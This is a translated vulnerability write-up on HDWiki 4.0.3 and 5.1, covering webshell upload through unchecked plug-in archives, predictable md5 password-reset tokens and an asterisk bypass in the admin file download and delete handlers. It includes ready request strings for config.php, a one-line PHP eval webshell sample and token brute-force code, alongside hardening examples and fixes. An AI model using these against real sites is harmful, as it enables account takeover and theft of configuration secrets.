A few days ago the HDWiki 5.1 injection vulnerability was published. While testing a site, I found the target was running HDWiki V4.0.3, and the template-writing technique published online does not seem to work on this version. After studying it, I found the following webshell upload method.
Specifically, when HDWiki V4.0.3 installs a plug-in online it does not inspect the files inside the compressed package, so you can put the shell into the archive and install it online.
After installation the shell sits in the plug-in's own directory under plugins; finding it from there is straightforward.
HDWiki V5.1 is simpler: the admin module has a file manager, so the shell can be uploaded directly.
The password-retrieval link is predictable:
This one is a little harder. There are two main points: 1. you need to know the e-mail address of the account being attacked; 2. you need the server timestamp accurately. When the wiki page itself is refreshed, the cookie contains a 13-digit millisecond (Java-style) timestamp; I tested it several times, dropping the last three digits, but its accuracy still differs from PHP's time(). There should be other ways to get the time from the wiki itself; I did not test them.
Code in control/user.php of version 5.1:
$timetemp = date("Y-m-d H:i:s", $this->time); // timestamp of the request
$verification = rand(1000, 9999); // 4-digit random number (the bounds are missing from the extracted text; 1000..9999 is assumed, matching the 4.0.3 loop below)
$encryptstring = md5($this->time . $verification); // token = md5(unix time . 4 digits)
$reseturl = WIKI_URL . "/index.php?user-getpass-" . $user['uid'] . '-' . $encryptstring;
$_ENV['user']->update_getpass($user['uid'], $encryptstring); // token stored in plain form
The code in control/user.php of version 4.0.3 is as follows:
$timetemp = date("Y-m-d h:i:s", $this->time);
while (($verification = rand() % 10000) < 1000); // loop until a 4-digit value 1000..9999
$encryptstring = md5($this->time . $verification);
$reseturl = $this->setting['site_url'] . "/index.php?user-getpass-" . $user['uid'] . '-' . $encryptstring;
The method I used may be special to this case, because the target site also ran a Discuz X2 forum. I clicked retrieve-password and refreshed a forum post within about one second, then used the timestamp shown in the forum post; the error is almost zero.
The four-digit random number is then easy to brute-force.
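The following is an added example, not HDWiki's code, that makes the size of the token search space concrete. It mirrors the md5($this->time . $verification) construction from control/user.php quoted above (a Unix timestamp concatenated with a 4-digit number in 1000..9999), converts a 13-digit millisecond timestamp to PHP time() by dropping the last three digits, enumerates every candidate within a few seconds of the guessed time, and shows a replacement generator built on the OS CSPRNG. The server side here is a mock; the host name wiki.example, the uid values and the 3600-second lifetime are assumptions for the demonstration.

```python
"""Added example (not HDWiki code): search space of an md5(time . 4-digit) reset
token, and a hardened replacement. Everything is an offline simulation."""
import hashlib
import random
import secrets
import time


def legacy_token(ts, verification):
    # Mirrors md5($this->time . $verification): string concatenation, then MD5.
    return hashlib.md5(f"{ts}{verification}".encode()).hexdigest()


def legacy_issue_reset(uid, now):
    """Mock of the vulnerable server: returns (reset_url, token)."""
    verification = random.randint(1000, 9999)  # same 1000..9999 range as the 4.0.3 loop
    token = legacy_token(now, verification)
    return f"http://wiki.example/index.php?user-getpass-{uid}-{token}", token  # host assumed


def js_millis_to_php_time(js_ms):
    """13-digit JavaScript/Java millisecond timestamp -> PHP time() (drop last 3 digits)."""
    return js_ms // 1000


def candidate_tokens(approx_ts, window):
    """Yield (ts, verification, token) for every second within +/- window of the
    guessed server time and every 4-digit verification value."""
    for ts in range(approx_ts - window, approx_ts + window + 1):
        for v in range(1000, 10000):
            yield ts, v, legacy_token(ts, v)


def recover_token(target_token, approx_ts, window=2):
    """Offline enumeration against a captured reset token.
    Returns (ts, verification, tries) on success, None if outside the window."""
    tries = 0
    for ts, v, tok in candidate_tokens(approx_ts, window):
        tries += 1
        if tok == target_token:
            return ts, v, tries
    return None


def search_space(window):
    """Number of candidates for a +/- window second timing error."""
    return (2 * window + 1) * 9000


# --- hardened replacement ---------------------------------------------------
def secure_issue_reset(uid, now, ttl=3600):
    """256 bits from the OS CSPRNG; only a hash is stored, with an expiry, so
    neither the database nor knowledge of the timestamp yields the token."""
    token = secrets.token_urlsafe(32)
    return {
        "token": token,  # goes into the e-mail only, never into the database
        "url": f"http://wiki.example/index.php?user-getpass-{uid}-{token}",
        "stored_hash": hashlib.sha256(token.encode()).hexdigest(),
        "expires": now + ttl,
    }


def secure_verify(record, presented, now):
    """Constant-time comparison of the presented token's hash, after the expiry check."""
    if now > record["expires"]:
        return False
    presented_hash = hashlib.sha256(presented.encode()).hexdigest()
    return secrets.compare_digest(presented_hash, record["stored_hash"])


if __name__ == "__main__":
    now = int(time.time())
    url, tok = legacy_issue_reset(42, now)
    guess = js_millis_to_php_time(now * 1000 + 731)  # e.g. taken from a forum post
    print(url)
    print("candidates for +/-2 s:", search_space(2))
    print("recovered (ts, verification, tries):", recover_token(tok, guess))
```

With a timing error of two seconds either way the attacker computes at most 45,000 MD5 hashes, which a laptop finishes in well under a second; knowing the uid from the URL and the e-mail address of the victim is all that is left. The hardened version removes the timestamp from the construction entirely, stores only a hash of the token and bounds its lifetime.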
During this test I also found that the backend file download and delete functions of version 4.0.3 (which require administrator privileges) do not restrict the directory strictly: replacing the dot with an asterisk bypasses the check, and the same trick works for deleting files.
index.php?admin_db-downloadfile-/**/config*php downloads config.php
index.php?admin_db-remove-/**/config*php deletes config.php
The same exists in version 5.1, but 5.1 already has a file manager, so this seems to matter less there. It is still a defect.
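Both weaknesses above, the plug-in installer that does not inspect archive contents and the admin_db download/remove handlers whose directory check can be bypassed with an asterisk, come down to the same missing control: the requested name must be confined to one base directory before anything touches the filesystem. The following added example, not HDWiki code, is one such check written in Python. It rejects absolute paths, parent-directory components, NUL bytes and the glob metacharacters the asterisk trick relies on, and then uses the same helper to audit a plug-in archive for server-executable files and escaping entries. The directory name plugins, the extension list and the sample archive are constructed assumptions for the demonstration.

```python
"""Added example (not HDWiki code): confine a user-supplied relative path to a
base directory, and audit a plug-in zip with the same rule."""
import io
import zipfile
from pathlib import Path

GLOB_CHARS = set("*?[]")          # shell/glob metacharacters; the '*' trick above
FORBIDDEN = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".htaccess"}
PLUGIN_DIR = "plugins"            # assumed location of installed plug-ins


def confine(base, requested):
    """Return base/requested as a resolved path, or raise ValueError if the
    request is absolute, contains '..', NUL, or glob metacharacters, or
    resolves outside base. All string checks happen before any expansion."""
    requested = requested.replace("\\", "/")
    if not requested or requested.startswith("/"):
        raise ValueError("empty or absolute path")
    if "\x00" in requested:
        raise ValueError("NUL byte")
    if GLOB_CHARS & set(requested):
        raise ValueError("glob metacharacter")
    if ".." in Path(requested).parts:
        raise ValueError("parent-directory component")
    base_r = Path(base).resolve()
    target = (base_r / requested).resolve()
    if target != base_r and base_r not in target.parents:
        raise ValueError("escapes base directory")
    return target


def is_confined(base, requested):
    """Boolean form of confine() for callers that only need accept/reject."""
    try:
        confine(base, requested)
        return True
    except ValueError:
        return False


def audit_plugin_zip(data, plugin_dir=PLUGIN_DIR):
    """Return [(entry_name, reason), ...] for every archive entry that must not
    be extracted: server-executable files and entries escaping plugin_dir."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.endswith("/"):          # directory entry, nothing to write
                continue
            p = Path(name)
            if p.suffix.lower() in FORBIDDEN or p.name.lower() in FORBIDDEN:
                problems.append((name, "server-side executable file"))
                continue
            try:
                confine(plugin_dir, name)
            except ValueError as err:
                problems.append((name, str(err)))
    return problems


def build_zip(entries):
    """Build an in-memory zip from {name: content}; names are stored verbatim."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample archive: one legitimate file, a shell, and a traversal entry.
SAMPLE_PLUGIN = build_zip({
    "myplugin/plugin.xml": "<plugin/>",
    "myplugin/shell.php": "<?php eval($_POST['c']); ?>",
    "../../config.php": "",
})

if __name__ == "__main__":
    for req in ["myplugin/plugin.xml", "/**/config*php", "**/config*php", "../config.php"]:
        print(f"{req!r:24} -> {'ok' if is_confined(PLUGIN_DIR, req) else 'rejected'}")
    for name, reason in audit_plugin_zip(SAMPLE_PLUGIN):
        print(f"reject {name}: {reason}")
```

The check must run on the raw string before any wildcard or filesystem expansion, which is exactly where the asterisk bypass slips past a filter that only looks for a literal dot. For plug-in archives an allow-list of expected file types is stronger than the deny-list shown here; the deny-list is kept short to keep the example readable.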
Summary:
I did not test the vulnerabilities already published online, mainly because they depend on null-byte truncation, and few environments still allow that now.
I also checked the arbitrary file upload vulnerability published online on 4.0.3 and 5.1 (I did not check 5.0): the file is still checked and the suffix cannot be bypassed. Perhaps my skill was insufficient.
Proof of vulnerability: the upload vulnerability is described in detail above.
The code that generates the password-retrieval link is the control/user.php excerpt from version 4.0.3 quoted above.
Solution:
Very few people seem to use version 4.0.3, and the vendor may not fix it: upgrade to the latest version.
The webshell upload through the file manager in version 5.1 is not a vulnerability by itself, but combined with the injection it is very easy to use. It is therefore recommended to set a strong administrator password and to avoid logging into the backend unnecessarily; that is relatively safe.
Fish from Jiangnan